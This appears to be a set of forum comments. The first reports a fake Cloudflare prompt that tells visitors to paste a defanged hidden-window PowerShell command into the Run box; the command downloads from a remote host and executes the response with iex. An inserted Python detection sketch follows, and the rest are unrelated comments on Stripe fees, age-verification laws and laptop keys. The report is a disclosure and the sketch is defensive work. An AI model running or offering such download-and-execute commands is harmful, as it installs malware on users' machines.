Has this phishing/infection vector been exposed yet? I visited a website of some professor hosted at a university. I was presented with the following Cloudflare message I've never seen before (image in linked tweet).
When I read the instructions, I had to do a double take. How many unsuspecting internet users would do this without thinking twice?
Win+R (run prompt), Ctrl+V (paste), Enter (execute).
What are we executing? This (I replaced . with [DOT]):
powershell -w h "curl bronxy[DOT]cc/sign/in|iex"
Threat actors often use the "iex" command for its ability to launch both local and remote payloads. I curled the URL, and for me, it showed a Teams exe from MS (VirusTotal here: https://virustotal.com/gui/url/fb9945173e557129d38ccdf204622...), but I wonder if the response switches to something malicious sometimes.
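A detection sketch for the command pattern quoted in the post above, added here as an example and not part of the original post: it flags a PowerShell launch that both downloads and pipes to iex, and raises severity when the window is hidden. The function names, severity labels, and every sample line except the command quoted from the post are constructed, and the input is assumed to be command lines pulled from process-creation logs.

```python
import re

# Indicators drawn from the command quoted in the post above.
LAUNCHER = re.compile(r"(?i)\b(?:powershell(?:\.exe)?|pwsh(?:\.exe)?)\b")
DOWNLOAD = re.compile(r"(?i)\b(?:curl|wget|iwr|irm|invoke-webrequest|"
                      r"invoke-restmethod|downloadstring)\b")
EXECUTE = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")
# PowerShell accepts abbreviated parameter names and enum values, which is
# why "-w h" in the post behaves like "-WindowStyle Hidden".
FLAG = re.compile(r"(?i)(?:^|\s)[-/](w[a-z]*)\s+[\"']?(h[a-z]*)\b")


def hidden_window(cmd):
    """True if any flag is a prefix of -WindowStyle with a prefix of Hidden."""
    return any("windowstyle".startswith(flag.lower())
               and "hidden".startswith(value.lower())
               for flag, value in FLAG.findall(cmd))


def triage(cmd):
    """Return 'high', 'medium' or None for one process command line."""
    if not LAUNCHER.search(cmd):
        return None
    # Download plus Invoke-Expression means remote content is run as code.
    if not (DOWNLOAD.search(cmd) and EXECUTE.search(cmd)):
        return None
    return "high" if hidden_window(cmd) else "medium"


# First entry is the command from the post (still defanged); the rest are
# constructed samples for comparison.
SAMPLES = [
    'powershell -w h "curl bronxy[DOT]cc/sign/in|iex"',
    'powershell.exe -NoProfile -Command "irm https://example.test/s.ps1 | Invoke-Expression"',
    r'powershell -WindowStyle Hidden -File C:\Scripts\backup.ps1',
    'curl https://example.test/file.zip -o file.zip',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(f"{str(triage(line)):7} {line}")
```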
In addition to the existing $15 fee every time someone files a dispute, @stripe will now start charging an additional $15 fee for countering the dispute, which you only get back if you win.
Banks constantly claw back legitimate transactions no matter what evidence you show them, so now they'll take $30 instead of $15¹.
This is highway robbery.
¹ - unless you use Stripe's Smart Disputes AI, which isn't out yet
We need this in the US. Otherwise, once laws like this https://apnews.com/article/utah-app-store-age-verification-7... go into effect, 3rd party app stores, like apkmirror.com, etc. are going to need to pull out of the US unless there's a service like that in the country. It's starting with Utah, but many states and even the feds are planning similar laws.
What knock-on effects do you see here, for state-led legislation about online privacy? Do we see privacy-conscious vs restrictive US states, and do folks in the (let’s say it, blue) states host US-centric Mullvads? Like out of state abortions.
Going further, how might this affect folks having “freedom is more important than safety” beliefs, given they reside in areas more likely to deny civil liberties-ish rights in the name of family values-ish rights, when this starts to really hit them where it hurts? Everything they do or say online becomes traceable to them, for a notoriously vocal-on-social media set.
The new laws, such as the one that just passed in Utah, require kids to get the consent of their parents to install apps. So now add that complexity to the flow.
Every time I consider one of your laptops, I see that there are no options for dedicated page up, page down, home, and end keys and those are deal breakers for me. I always end up with a Lenovo instead.
Would you consider adding keyboard options that include these keys?
FWIW I have a Framework 16, and the keyboards run QMK, so are reprogrammable. I have those keys at the top row of my macropad. They don't have labels and are in kind of a weird place, but probably not less weird than an average laptop.